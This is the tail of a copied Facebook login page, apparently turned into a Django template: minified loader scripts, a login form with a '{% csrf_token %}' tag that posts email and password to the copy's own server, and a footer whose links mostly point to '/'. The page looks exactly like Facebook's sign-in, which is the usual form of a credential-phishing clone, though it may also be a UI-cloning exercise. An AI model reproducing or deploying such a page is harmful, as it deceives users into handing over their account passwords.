"transition_id": 0, "version": 6 }, 5888], ["cr:686", [], { "__rc": [null, "Aa28zcoUbx9v4EFPmAyxaSE9j8ah0DVWsi4-R1KmFvwehFlCc0ncuEWvyErWqx1ymM0xWA5l03Ztb55ln-6zVlNG"] }, -1], ["cr:1984081", [], { "__rc": [null, "Aa36QAEtseklpCIN27DVv3mxTWucz2--RcTfthPyRm9j9T-vQCzjBC_SV4P4ToahArScGAEd0tRAOinI2WI_p10eDTGX"] }, -1]], "require": [["markJSEnabled"], ["lowerDomain"], ["URLFragmentPrelude"], ["Primer"], ["BigPipe"], ["Bootloader"], ["TimeSlice"], ["AsyncRequest"], ["BanzaiScuba_DEPRECATED"], ["VisualCompletionGating"], ["FbtLogging"], ["IntlQtEventFalcoEvent"], ["RequireDeferredReference", "unblock", [], [["AsyncRequest", "BanzaiScuba_DEPRECATED", "VisualCompletionGating", "FbtLogging", "IntlQtEventFalcoEvent"], "sd"]], ["RequireDeferredReference", "unblock", [], [["AsyncRequest", "BanzaiScuba_DEPRECATED", "VisualCompletionGating", "FbtLogging", "IntlQtEventFalcoEvent"], "css"]]] }); });</script>
</head>

<body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_GB" dir="ltr">
    <script type="text/javascript"
        nonce="uZn0pQB6">requireLazy(["bootstrapWebSession"], function (j) { j(1647245433) })</script>
    <div class="_li" id="u_0_3_PN">
        <div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_4_X2">
            <div class="_608m">
                <div class="_5aj7 _tb6">
                    <div class="_4bl7"><span class="mrm _3bcv _50f3">Jump to</span></div>
                    <div class="_4bl9 _3bcp">
                        <div class="_6a _608n" aria-label="Navigation assistant" aria-keyshortcuts="Alt+/"
                            role="menubar" id="u_0_5_ww">
                            <div class="_6a uiPopover" id="u_0_6_Si"><a role="button"
                                    class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="#"
                                    style="max-width:200px;" aria-haspopup="true" aria-expanded="false" rel="toggle"
                                    id="u_0_7_sN"><span class="_55pe">Sections of this page</span><span
                                        class="_4o_3 _3-99"><i class="img sp_pG83WoSi7l2 sx_d0b8e7"></i></span></a>
                            </div>
                            <div class="_6a _3bcs"></div>
                            <div class="_6a mrm uiPopover" id="u_0_8_gY"><a role="button"
                                    class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy"
                                    href="#" style="max-width:200px;" aria-haspopup="true" tabindex="-1"
                                    aria-expanded="false" rel="toggle" id="u_0_9_PF"><span class="_55pe">Accessibility
                                        help</span><span class="_4o_3 _3-99"><i
                                            class="img sp_pG83WoSi7l2 sx_b7775b"></i></span></a></div>
                        </div>
                    </div>
                    <div class="_4bl7 mlm pll _3bct">
                        <div class="_6a _3bcy">Press <span class="_3bcz">alt</span> + <span class="_3bcz">/</span> to
                            open this menu</div>
                    </div>
                </div>
            </div>
        </div>
        <div id="globalContainer" class="uiContextualLayerParent">
            <div class="fb_content clearfix " id="content" role="main">
                <div>
                    <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
                        <div class="_8esk">
                            <div class="_8esl">
                                <div class="_8ice"><img class="fb_logo _8ilh img"
                                        src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
                                        alt="Facebook" /></div>
                                <h2 class="_8eso">Facebook helps you connect and share with the people in your life.
                                </h2>
                            </div>
                            <div class="_8esn">
                                <div class="_8iep _8icy _9ahz _9ah-">
                                    <div class="_6luv _52jv">
                                        <form class="_9vtf" action="/" method="post">
                                            {% csrf_token %}
                                            <input type="hidden" name="jazoest" value="2970" autocomplete="off" /><input
                                                type="hidden" name="lsd" value="AVo9uBDanRo" autocomplete="off" />
                                            <div>
                                                <div class="_6lux">
                                                    <input type="email" class="inputtext _55r1 _6luy" name="email"
                                                        id="email" data-testid="royal_email"
                                                        placeholder="Email address or phone number" autofocus="1"
                                                        aria-label="Email address or phone number" />
                                                </div>
                                                <div class="_6lux">
                                                    <div class="_6luy _55r1 _1kbt" id="passContainer"><input
                                                            type="password" class="inputtext _55r1 _6luy _9npi"
                                                            name="password" id="pass" data-testid="royal_pass"
                                                            placeholder="Password" aria-label="Password" />
                                                        <div class="_9ls7" id="u_0_b_3/"><a href="#" role="button">
                                                                <div class="_9lsa">
                                                                    <div class="_9lsb" id="u_0_c_JJ"></div>
                                                                </div>
                                                            </a></div>
                                                    </div>
                                                </div>
                                            </div><input type="hidden" autocomplete="off" name="login_source"
                                                value="comet_headerless_login" /><input type="hidden" autocomplete="off"
                                                name="next" value="" />
                                            <div class="_6ltg"><button value="1"
                                                    class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login"
                                                    data-testid="royal_login_button" type="submit" id="u_0_d_eo">Log
                                                    In</button></div>
                                            <div class="_6ltj"><a href="/">Forgotten
                                                    password?</a></div>
                                            <div class="_8icz"></div>
                                            <div class="_6ltg"><a role="button"
                                                    class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="/"
                                                    ajaxify="/reg/spotlight/" id="u_0_2_EO"
                                                    data-testid="open-registration-form-button" rel="async">Create New
                                                    Account</a></div>
                                        </form>
                                    </div>
                                    <div id="reg_pages_msg" class="_58mk"><a href="/" class="_8esh">Create a
                                            Page</a> for a celebrity, brand or business.</div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="">
                <div class="_95ke _8opy">
                    <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
                        <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
                            <li>English (UK)</li>
                            <li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog"
                                    ajaxify="/settings/language/language/?uri=https%3A%2F%2Fkn-in.facebook.com%2F&amp;source=www_list_selector_more"
                                    href="#" title="Show more languages"><i
                                        class="img sp_pG83WoSi7l2 sx_5d02a6"></i></a></li>
                        </ul>
                        <div id="contentCurve"></div>
                        <div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links">
                            <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                                <li><a href="/" title="Sign up for Facebook">Sign Up</a></li>
                                <li><a href="/" title="Log in to Facebook">Log In</a></li>
                                <li><a href="/" title="Take a look at Messenger.">Messenger</a>
                                </li>
                                <li><a href="/" title="Facebook Lite for Android.">Facebook Lite</a></li>
                                <li><a href="/" title="Browse our Watch videos.">Watch</a>
                                </li>
                                <li><a href="/places/" title="Take a look at popular places on Facebook.">Places</a>
                                </li>
                                <li><a href="/" title="Check out Facebook games.">Games</a></li>
                                <li><a href="/marketplace/"
                                        title="Buy and sell on Facebook Marketplace.">Marketplace</a></li>
                                <li><a href="/" title="Learn more about Facebook Pay" target="_blank">Facebook Pay</a>
                                </li>
                                <li><a href="/" title="Learn more about Oculus" target="_blank">Oculus</a></li>
                                <li><a href="/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li>
                                <li><a href="/" title="Take a look at Instagram" target="_blank" rel="noopener nofollow"
                                        data-lynx-mode="asynclazy">Instagram</a></li>
                                <li><a href="/" title="Take a look at Bulletin newsletter">Bulletin</a></li>
                                <li><a href="/" title="Browse our Local Lists directory.">Local</a></li>
                                <li><a href="/" title="Donate to worthy causes.">Fundraisers</a></li>
                                <li><a href="/" title="/">Services</a></li>
                                <li><a href="/" title="See the Voting Information Centre">Voting Information Centre</a>
                                </li>
                                <li><a href="/" title="Explore our groups.">Groups</a></li>
                                <li><a href="/" accesskey="8"
                                        title="Read our blog, discover the resource centre and find job opportunities.">About</a>
                                </li>
                                <li><a href="/" title="Advertise on Facebook">Create ad</a></li>
                                <li><a href="/" title="Create a Page">Create Page</a>
                                </li>
                                <li><a href="/">Developers</a></li>
                                <li><a href="/" title="Make your next career move to our brilliant company.">Careers</a>
                                </li>
                                <li><a data-nocookies="1" href="/"
                                        title="Learn about your privacy and Facebook.">Privacy</a></li>
                                <li><a href="/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a>
                                </li>
                                <li><a class="_41ug" data-nocookies="1" href="/"
                                        title="Learn about AdChoices.">AdChoices<i
                                            class="img sp_pG83WoSi7l2 sx_d865f7"></i></a></li>
                                <li><a data-nocookies="1" href="/" accesskey="9"
                                        title="Review our terms and policies.">Terms</a></li>
                                <li><a href="/" accesskey="0" title="Visit our Help Centre.">Help</a></li>
                                <li><a accesskey="6" class="accessible_elem" href="/"
                                        title="View and edit your Facebook settings.">Settings</a></li>
                                <li><a accesskey="7" class="accessible_elem" href="/"
                                        title="View your activity log">Activity log</a></li>
                            </ul>
                        </div>
                        <div class="mvl copyright">
                            <div><span> Meta © 2022</span></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0"
                style="display:none" /></span>
    </div>
    <div style="display:none"></div>
    <script>requireLazy(["HasteSupportData"], function (m) { m.handle({ "bxData": { "875231": { "uri": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico" } }, "gkxData": { "4166": { "result": false, "hash": "AT7yrb5QuQ92736ualo" }, "677762": { "result": true, "hash": "AT6e9MvRyXpacwOYxOI" }, "1908135": { "result": false, "hash": "AT6miGypJl3m2Aq4s1Q" }, "3959": { "result": true, "hash": "AT5An4B4pPVNHiK8jlQ" }, "524": { "result": false, "hash": "AT6SLNReg1ijh3bZ6_o" }, "819236": { "result": false, "hash": "AT66vW86d2uJ-kXPbcU" }, "12": { "result": false, "hash": "AT7MdxfOMhMQYcz0qCE" }, "1646": { "result": false, "hash": "AT4QD7x1GFNYajJZYz4" }, "3521": { "result": true, "hash": "AT6JXdAr_AL9yUh_9ZQ" }, "729631": { "result": false, "hash": "AT7b0tj8AHWG5lTFJTw" }, "1281505": { "result": false, "hash": "AT4PHZM9gFoypCjQ1TI" }, "1291023": { "result": false, "hash": "AT519LseIG1nwq3oSRA" }, "1294182": { "result": false, "hash": "AT4vd6mwrtAJouEJYh0" }, "1399218": { "result": true, "hash": "AT6guCW1eyIkOV1Eeqw" }, "1401060": { "result": true, "hash": "AT5aetN5Gb3reIXVdKc" }, "1485055": { "result": true, "hash": "AT5lkGxmhfrVKlcn-z0" }, "1596063": { "result": false, "hash": "AT7JHuDWtaOqRuBUWr8" }, "1597642": { "result": true, "hash": "AT78G4fDXhlnMl7orI4" }, "1647260": { "result": false, "hash": "AT4WdkrQSGE5dIsEKLA" }, "1695831": { "result": false, "hash": "AT7RA6TJmDFGF-D6fUU" }, "1722014": { "result": false, "hash": "AT6_M5gpc6RLrHjcuxg" }, "1742795": { "result": false, "hash": "AT6dbnY5JZm_bTIN5yQ" }, "1778302": { "result": false, "hash": "AT65fisZhmc2X92EhHc" }, "1840809": { "result": false, "hash": "AT5nYctoTsr7alRiRRE" }, "1848749": { "result": false, "hash": "AT5GsH9Kb-3W-taZ_90" }, "1906871": { "result": false, "hash": "AT6dIBiVv9bUDXlmTTk" }, "1985945": { "result": true, "hash": "AT66Oo5lY__5wUTpnrU" }, "5541": { "result": true, "hash": "AT70V-Q_zfEykznOqDM" }, "1099893": { "result": false, "hash": "AT5kly2LSZV_DKGROx8" } }, "qexData": { "644": { "r": null }, "647": { "r": null } } }) }); requireLazy(["Bootloader"], function (m) { m.handlePayload({ "consistency": { "rev": 1005189989 }, "rsrcMap": { "i4ulAqS": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/Jhvid9xmsdT.js?_nc_x=Ij3Wp8lg5Kz" }, "fijQxTO": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ij9m4\/yj\/l\/en_GB\/SMcHjaqIAfX.js?_nc_x=Ij3Wp8lg5Kz" }, "K8Tkk+K": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/kQ6ak39g_ll.js?_nc_x=Ij3Wp8lg5Kz" }, "nRLDAVe": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yw\/r\/yA8iyyioou_.js?_nc_x=Ij3Wp8lg5Kz" }, "x9SVR1B": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iCwx4\/yg\/l\/en_GB\/dhc0aXs2OHT.js?_nc_x=Ij3Wp8lg5Kz" }, "j7ouj5h": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/juq7-UwCfHa.js?_nc_x=Ij3Wp8lg5Kz" }, "wBcCFVS": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i3674\/yH\/l\/en_GB\/xasP7su8jYB.js?_nc_x=Ij3Wp8lg5Kz" }, "kCH74Pf": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yr\/r\/WsDmdtCAV2M.js?_nc_x=Ij3Wp8lg5Kz" }, "VYX+Uc1": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yu\/r\/vKqFq0cff0A.js?_nc_x=Ij3Wp8lg5Kz" }, "Ak7k+E5": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yM\/r\/RoTFtc-pTLh.js?_nc_x=Ij3Wp8lg5Kz" }, "OxA+Wgt": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i8NL4\/yE\/l\/en_GB\/AHC2WvrXT8B.js?_nc_x=Ij3Wp8lg5Kz" }, "2\/maQ\/Q": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/mPQTxAVB7AK.js?_nc_x=Ij3Wp8lg5Kz" }, "qjUZXT\/": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y5\/r\/SvrlhJ7-VPF.js?_nc_x=Ij3Wp8lg5Kz" }, "2CbDRJL": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/wIj-E6Prut5.js?_nc_x=Ij3Wp8lg5Kz" }, "7cukL\/U": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iPIv4\/yA\/l\/en_GB\/mf2YwRE00p8.js?_nc_x=Ij3Wp8lg5Kz" }, "dXlZ41I": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y9\/r\/sD4Wae7nyKt.js?_nc_x=Ij3Wp8lg5Kz" }, "jIgZ84k": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y3\/r\/B8hidu-Djgs.js?_nc_x=Ij3Wp8lg5Kz" }, "k6PP1ED": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yz\/r\/-x4ecKLbDaO.js?_nc_x=Ij3Wp8lg5Kz" }, "lCiWnqM": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iNEW4\/yQ\/l\/en_GB\/7SXfmyLRrBz.js?_nc_x=Ij3Wp8lg5Kz" }, "56VCh9H": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iFJJ4\/yX\/l\/en_GB\/Gcdqi7dvOG_.js?_nc_x=Ij3Wp8lg5Kz" }, "LAwnrBZ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3idBq4\/yP\/l\/en_GB\/cwg3T0n2_I_.js?_nc_x=Ij3Wp8lg5Kz" }, "LHrFeMg": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ym\/l\/0,cross\/wlMH-j-XF_Y.css?_nc_x=Ij3Wp8lg5Kz" }, "yDCO5VH": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/Bk43uuGXU5C.js?_nc_x=Ij3Wp8lg5Kz" }, "i89GxPT": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/l\/0,cross\/GcY-VqRQKWW.css?_nc_x=Ij3Wp8lg5Kz" }, "LMy7abA": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y2\/r\/iow34CCIqP8.js?_nc_x=Ij3Wp8lg5Kz" }, "0VY7AKa": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yz\/r\/QZXV9QSDO9d.js?_nc_x=Ij3Wp8lg5Kz" }, "Jujczgk": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iAgG4\/yd\/l\/en_GB\/nwxAmNuqfOU.js?_nc_x=Ij3Wp8lg5Kz" }, "45g2zGz": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yN\/r\/g2e1F4SS2Pz.js?_nc_x=Ij3Wp8lg5Kz" }, "Kzwq6Gp": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3itDX4\/yM\/l\/en_GB\/n8z7zEhLJjm.js?_nc_x=Ij3Wp8lg5Kz" }, "r\/uc3bI": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iJMt4\/yY\/l\/en_GB\/t8HM75Xxqge.js?_nc_x=Ij3Wp8lg5Kz" }, "qLVlwK6": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/r\/pMz20gLTvQG.js?_nc_x=Ij3Wp8lg5Kz" }, "KnHLe0g": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yS\/r\/gTPPk8DgAWs.js?_nc_x=Ij3Wp8lg5Kz" }, "4165MiE": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iZcV4\/y4\/l\/en_GB\/YgvnvoiStpP.js?_nc_x=Ij3Wp8lg5Kz" }, "XNjXVmx": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/a95XE31T1L9.js?_nc_x=Ij3Wp8lg5Kz" }, "zVEN6sn": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/FmcD4lm55ny.js?_nc_x=Ij3Wp8lg5Kz" }, "NLRElBb": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/htEKSwTvTgn.js?_nc_x=Ij3Wp8lg5Kz" }, "Scqncyq": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yQ\/r\/44wbzL6ZQUN.js?_nc_x=Ij3Wp8lg5Kz" }, "H\/u0oAm": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/l\/0,cross\/yJrlwm5uBGC.css?_nc_x=Ij3Wp8lg5Kz" }, "sugpTJJ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iH_P4\/yU\/l\/en_GB\/y9JKScpVIre.js?_nc_x=Ij3Wp8lg5Kz" }, "rK9Eu5T": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ifpJ4\/yQ\/l\/en_GB\/qGp9F63giQ5.js?_nc_x=Ij3Wp8lg5Kz" }, "eLfegN8": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iTQy4\/yP\/l\/en_GB\/5vD8jQTXrjP.js?_nc_x=Ij3Wp8lg5Kz" }, "E47d7TK": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iwdk4\/yV\/l\/en_GB\/hLGeZ2lPW4L.js?_nc_x=Ij3Wp8lg5Kz" }, "45foxCp": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yO\/r\/PqEI709PwK0.js?_nc_x=Ij3Wp8lg5Kz" }, "Af7ilQc": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yP\/r\/sjEpyNKVANG.js?_nc_x=Ij3Wp8lg5Kz" }, "ZYYem5O": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yG\/l\/0,cross\/fTXZk5zhYud.css?_nc_x=Ij3Wp8lg5Kz" }, "PAr9NV8": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iXGq4\/y2\/l\/en_GB\/g13dTP8aUnD.js?_nc_x=Ij3Wp8lg5Kz" }, "Vws9yNg": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ihHI4\/y6\/l\/en_GB\/okyLkZF6gUn.js?_nc_x=Ij3Wp8lg5Kz" }, "Dg0yxcL": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ikxI4\/yR\/l\/en_GB\/_R6duRAIkZn.js?_nc_x=Ij3Wp8lg5Kz" }, "9ebCY1Y": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/5QtQW4fIWfO.js?_nc_x=Ij3Wp8lg5Kz" }, "6Xe9Ood": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y9\/l\/0,cross\/tuffxds-KQm.css?_nc_x=Ij3Wp8lg5Kz" }, "0kukt1t": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iSSc4\/yZ\/l\/en_GB\/j5TBauinLYI.js?_nc_x=Ij3Wp8lg5Kz" }, "ejPqH9p": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/r\/zVxVj-L4WyD.js?_nc_x=Ij3Wp8lg5Kz" }, "nMb1358": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yw\/r\/8CX9WAYsd9-.js?_nc_x=Ij3Wp8lg5Kz" }, "zPLgIGT": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yz\/r\/lYejkzyV906.js?_nc_x=Ij3Wp8lg5Kz" }, "FJvGK\/j": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/l\/0,cross\/dwLGpjJn4cY.css?_nc_x=Ij3Wp8lg5Kz" }, "zTZTipw": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLl54\/yk\/l\/en_GB\/DK33Bbx4-UB.js?_nc_x=Ij3Wp8lg5Kz" }, "O47flqQ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/r\/-JEw1xRrb3s.js?_nc_x=Ij3Wp8lg5Kz" }, "mDyabti": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/r\/mEzagDJWUSz.js?_nc_x=Ij3Wp8lg5Kz" }, "rQNXMsL": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iW4s4\/yq\/l\/en_GB\/4dVnMh5nEqP.js?_nc_x=Ij3Wp8lg5Kz" }, "GxNObu9": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/l\/0,cross\/jywv-SrzD4e.css?_nc_x=Ij3Wp8lg5Kz" }, "2nBQd0w": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ihp64\/yb\/l\/en_GB\/V89hmgbX2zc.js?_nc_x=Ij3Wp8lg5Kz" }, "MqpG8ge": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iTSN4\/yS\/l\/en_GB\/ilV3LdFtVBC.js?_nc_x=Ij3Wp8lg5Kz" }, "f4p3vYU": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iARV4\/yD\/l\/en_GB\/wskbwhg2g5U.js?_nc_x=Ij3Wp8lg5Kz" }, "YqWOm9l": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iMTG4\/y1\/l\/en_GB\/in7gORaMnQ2.js?_nc_x=Ij3Wp8lg5Kz" }, "aF9iPHd": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLl54\/yi\/l\/en_GB\/yMzqnohiu7a.js?_nc_x=Ij3Wp8lg5Kz" }, "+u9G3gN": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yv\/l\/0,cross\/Oxfk8Yi13ow.css?_nc_x=Ij3Wp8lg5Kz" }, "TuiPcIO": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yA\/l\/0,cross\/OUw2QIwWBFP.css?_nc_x=Ij3Wp8lg5Kz" }, "FH2jy2l": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yK\/l\/0,cross\/jZ5PECXdtbC.css?_nc_x=Ij3Wp8lg5Kz" }, "sZXmT5E": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yM\/l\/0,cross\/wUQFCPJQWYh.css?_nc_x=Ij3Wp8lg5Kz" }, "i8nkeln": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yB\/r\/lpirYHPwsaG.js?_nc_x=Ij3Wp8lg5Kz" }, "dsV5VvK": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yQ\/l\/0,cross\/lZ2emUOGiQ-.css?_nc_x=Ij3Wp8lg5Kz" }, "jj29UZB": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/r\/w5W7kbBpKe-.js?_nc_x=Ij3Wp8lg5Kz" }, "9jeSk45": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iFVC4\/yD\/l\/en_GB\/SCBWxoK-dMc.js?_nc_x=Ij3Wp8lg5Kz" }, "EmFhCQC": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yu\/l\/0,cross\/bAUsSQgvbNq.css?_nc_x=Ij3Wp8lg5Kz" }, "RJ82Y0Y": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i1A04\/yP\/l\/en_GB\/tb3BLIduFoA.js?_nc_x=Ij3Wp8lg5Kz" }, "npROeLX": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/l\/0,cross\/XkyVDkrmIsn.css?_nc_x=Ij3Wp8lg5Kz" }, "0m3+qD3": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yK\/l\/0,cross\/DVlL9MhT5Ht.css?_nc_x=Ij3Wp8lg5Kz" }, "4Mhs36H": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/nNVrkvVipZ-.js?_nc_x=Ij3Wp8lg5Kz" }, "8Z0Ev\/x": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ig4g4\/y-\/l\/en_GB\/E-wiyPfwiHe.js?_nc_x=Ij3Wp8lg5Kz" }, "SrpP6vx": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/bll4-7p4Ipj.js?_nc_x=Ij3Wp8lg5Kz" }, "rVKs1ll": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y-\/l\/0,cross\/xC3i3vsUuAF.css?_nc_x=Ij3Wp8lg5Kz" }, "GQaWz8T": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/r\/ngE_0xyFwgy.js?_nc_x=Ij3Wp8lg5Kz" }, "m+Iv8v9": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/l\/0,cross\/gVszLr-20Lr.css?_nc_x=Ij3Wp8lg5Kz" }, "xeZxb4y": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/l\/0,cross\/BdZkXBG5IgB.css?_nc_x=Ij3Wp8lg5Kz" }, "kyWuS\/P": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/YZAlreQAV_M.js?_nc_x=Ij3Wp8lg5Kz" }, "TGOK6VK": { "type": "css", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y3\/l\/0,cross\/vkeL_J22WCA.css?_nc_x=Ij3Wp8lg5Kz" }, "xXr6omd": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ievZ4\/y-\/l\/en_GB\/Y_-GYndmwoP.js?_nc_x=Ij3Wp8lg5Kz" }, "NaRov2Z": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7xv4\/yH\/l\/en_GB\/iecet726DmQ.js?_nc_x=Ij3Wp8lg5Kz" }, "nQ1LPEi": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/3124vtmhcTM.js?_nc_x=Ij3Wp8lg5Kz" }, "ovx4rrL": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i4EL4\/yS\/l\/en_GB\/2jtckT4HFzT.js?_nc_x=Ij3Wp8lg5Kz" }, "HvMFJzQ": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iHTt4\/yU\/l\/en_GB\/xS5fQb4lGQk.js?_nc_x=Ij3Wp8lg5Kz" 